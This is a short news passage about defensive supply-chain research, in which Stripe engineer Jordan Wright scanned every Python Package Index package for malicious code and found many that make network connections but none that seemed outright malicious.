Security experts worry that attackers are focused on infecting systems by inserting malicious code into popular repositories. A number of projects have kicked off this year to search for such Trojan horses. Stripe engineer Jordan Wright published the results of a home-brew research project that downloaded every Python component from the Python Package Index. He found hundreds of packages that created a common dependency by including a network connection. However, none of the scanned packages seemed outright malicious, Wright said in his analysis. He plans to expand the effort to continuously monitor PyPI and add repositories for other platforms.”]